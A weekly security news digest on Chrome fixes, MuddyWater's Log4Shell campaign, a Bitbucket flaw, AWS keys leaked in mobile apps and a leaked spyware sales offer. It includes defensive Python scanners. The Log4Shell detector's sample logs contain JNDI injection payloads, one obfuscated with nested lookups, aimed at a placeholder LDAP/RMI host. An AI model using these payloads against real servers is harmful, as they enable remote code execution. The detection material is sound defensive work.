Here are the most relevant headlines of the week; take note and keep up to date with all the details:
Google’s latest security bulletin fixes 24 vulnerabilities, including a critical flaw (CVE-2022-3038), and adds the Sanitizer API to protect users from XSS injection attacks.
Most of the patched vulnerabilities were memory management issues, with use-after-free and buffer overflow flaws affecting components such as WebUI and Screen Capture.
Google has also corrected several vulnerabilities in security policies and incorrect implementations.
There may be no evidence yet that these vulnerabilities are being actively exploited. Still, a severe unpatched vulnerability affects the operating system clipboard through Chromium-based browsers, and it can be exploited without any authorization or interaction from the user.
Google also recommends installing the browser’s latest version to fix these flaws.
Microsoft has published details of a recent investigation carried out by its Threat Intelligence Center (MSTIC): it reports a wave of attacks by the MuddyWater threat actor (tracked as Mercury by Microsoft) against targets in Israel.
This actor has been using the well-known Log4Shell vulnerability to compromise unpatched software. The attacks mainly targeted SysAid, an IT management application, rather than the VMware software that has traditionally been the target of these attacks.
MuddyWater exploited the vulnerabilities as the initial point of entry into the victim’s system, then ran web shells to execute malicious commands, created users with admin privileges, stole credentials via Mimikatz, and moved laterally with tools such as RemCom or Windows Management Instrumentation.
Microsoft’s recommendation to avoid these attacks: apply the patches for this set of vulnerabilities, available since January 2022.
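A defender-side illustration of the detection angle for the Log4Shell activity described above. This is an added example, not Microsoft’s tooling or anything taken from the report: it scans constructed web-server access log lines for JNDI lookup strings, first collapsing the text-producing Log4j lookups (`${lower:...}`, `${upper:...}` and the `${name:-...}` default-value form) that are commonly used to split up the keyword. The log format, IP addresses and paths are all made up.

```python
import re

# Constructed sample web-server access log lines for illustration (not real
# traffic). Lines 3 and 4 carry JNDI lookup strings in the User-Agent field,
# the first plain and the second wrapped in a nested lookup that hides "jndi".
SAMPLE_LOG = """\
10.0.0.5 - - [25/Aug/2022:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [25/Aug/2022:10:01:05 +0000] "POST /api/login HTTP/1.1" 200 88 "-" "curl/7.68.0"
10.0.0.9 - - [25/Aug/2022:10:02:11 +0000] "GET /login HTTP/1.1" 404 0 "-" "${jndi:ldap://203.0.113.10:1389/a}"
10.0.0.9 - - [25/Aug/2022:10:02:15 +0000] "GET /login HTTP/1.1" 404 0 "-" "${${lower:j}ndi:rmi://203.0.113.10/b}"
"""

# Matches a JNDI lookup once the line has been normalized.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Log4j lookups that resolve to plain text and are commonly used to split up
# the "jndi" keyword: ${lower:x} / ${upper:x}, and the default-value form
# ${name:-x}, which yields x when "name" is undefined.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")


def normalize(text: str) -> str:
    """Collapse nested text-producing lookups until the string stops changing."""
    previous = None
    while previous != text:
        previous = text
        text = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def find_jndi_lookups(log_text: str) -> list[tuple[int, str, str]]:
    """Return (line number, client IP, normalized line) for each suspicious line."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        normalized = normalize(line)
        if JNDI_RE.search(normalized):
            client_ip = line.split(" ", 1)[0]  # first field of the combined log format
            hits.append((lineno, client_ip, normalized))
    return hits


if __name__ == "__main__":
    for lineno, ip, line in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {lineno}: JNDI lookup from {ip}: {line}")
```

The normalization step matters more than the final regex: a rule that only looks for the literal `${jndi:` misses the fourth line entirely, which is why most published detection rules either normalize first or match on the lookup syntax more loosely. Matching on the server side only shows attempts; a hit still needs to be correlated with outbound LDAP/RMI connections from the application host to tell exploitation from scanning.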
More info: https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/
Who warns? Atlassian, to its users.
Vulnerability: a new critical one affecting Bitbucket Server and Data Center, which should be patched immediately.
The flaw, CVE-2022-36804, has a CVSS v3 score of 9.9 according to Atlassian, and it allows command injection through specially crafted HTTP requests, which opens the way to remote code execution.
Exploitation of the vulnerability: it is not complex and does not require high privileges. The attacker would only need read access to a public or private repository and would not need any interaction from the user.
Recommendations: Atlassian recommends temporarily closing public repositories for all users who cannot patch this issue right away.
Meanwhile, Max Garret, the researcher who found this vulnerability and reported it to Atlassian, has said he will publish a PoC in 30 days.
Detected by: Symantec’s Threat Hunting team
What? Nearly 2,000 mobile apps containing encrypted AWS (Amazon Web Services) credentials.
Most of the apps (1,856) are iOS apps, while only 37 are Android apps.
77% of the apps have been confirmed to include valid AWS access tokens that could be used to directly access private cloud services.
In addition, an attacker could use those valid AWS tokens to access cloud instances whose active service databases contain millions of records: user account details, internal communications, and other sensitive data.
Symantec’s research is intended to warn mobile app developers of the dangers of over-reliance on, or insecure handling of, AWS credentials: exposing them makes the mobile app supply chain vulnerable and opens the door for malicious actors to private databases, leading to potential data breaches and exposure of end users’ personal data.
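As an added example (not Symantec’s code or methodology), here is a small scanner of the kind a mobile team could run over an unpacked app bundle in CI to catch shipped AWS credentials before release. The access key ID format is AWS’s documented one (20 characters, `AKIA`/`ASIA` prefix); the sample files are constructed, and the credential values are the example pair AWS uses in its own documentation, not live keys.

```python
import re
from pathlib import Path

# AWS access key IDs are 20 characters: a 4-letter prefix (AKIA for long-term
# user keys, ASIA for temporary STS keys) followed by 16 upper-case
# alphanumerics. The secret key is 40 base64-like characters with no fixed
# prefix, so it is only matched when it sits next to a well-known parameter name.
ACCESS_KEY_RE = re.compile(r"\b((?:AKIA|ASIA)[0-9A-Z]{16})\b")
SECRET_KEY_RE = re.compile(
    r"(?i)(?:aws_?secret(?:_access)?_key|secretAccessKey)"
    r"\s*[\"']?\s*[=:]\s*[\"']?([A-Za-z0-9/+=]{40})"
)

# Constructed sample files, as they might come out of an unpacked app bundle.
# The key pair in config.json is AWS's published documentation example.
SAMPLE_FILES = {
    "Info.plist": "<key>CFBundleName</key><string>ExampleApp</string>",
    "config.json": (
        '{"region": "us-east-1", "accessKeyId": "AKIAIOSFODNN7EXAMPLE", '
        '"secretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"}'
    ),
    "strings.xml": '<string name="api_base">https://api.example.com</string>',
}


def mask(secret: str) -> str:
    """Keep only the ends so a finding can be reported without re-leaking it."""
    return secret[:4] + "..." + secret[-4:]


def scan_text(name: str, text: str) -> list[tuple[str, str, str]]:
    """Return (file name, finding kind, value) for every credential-looking string."""
    findings = []
    for m in ACCESS_KEY_RE.finditer(text):
        findings.append((name, "access_key_id", m.group(1)))
    for m in SECRET_KEY_RE.finditer(text):
        findings.append((name, "secret_access_key", m.group(1)))
    return findings


def scan_bundle(files: dict[str, str]) -> list[tuple[str, str, str]]:
    """Scan an in-memory mapping of file name -> text content."""
    findings = []
    for name, text in files.items():
        findings.extend(scan_text(name, text))
    return findings


def scan_directory(root: str) -> list[tuple[str, str, str]]:
    """Scan every file under a real unpacked bundle directory (hypothetical path)."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file():
            findings.extend(scan_text(str(path), path.read_text(errors="ignore")))
    return findings


if __name__ == "__main__":
    for name, kind, value in scan_bundle(SAMPLE_FILES):
        print(f"{name}: {kind} found: {mask(value)}")
```

Such a scan is a last line of defence, not the fix: the finding the report describes is that long-term keys were shipped at all. The app should obtain short-lived credentials (for example through a backend the app authenticates to, or an identity service that issues temporary STS tokens) scoped to the one action it needs, so that extracting the binary yields nothing that opens the account’s databases.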
More info: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mobile-supply-chain-aws
A document belonging to the Israel-based company Intellexa was recently leaked and uploaded to Twitter by the VX-underground account; it shows a commercial offer of spyware for a price of 8 million euros.
The spyware works on iOS version 15.4.1 and Android version 12 and, since it is a 0-day, it is unlikely to have been patched or to stop working on the newer versions of these operating systems. This exploit allows remote access to the data on the affected devices.
The infection vector would be a link that has to be clicked to inject the payload into the device.
More info: https://www.securityweek.com/leaked-docs-show-spyware-firm-offering-ios-android-hacking-services-8-million?&web_view=true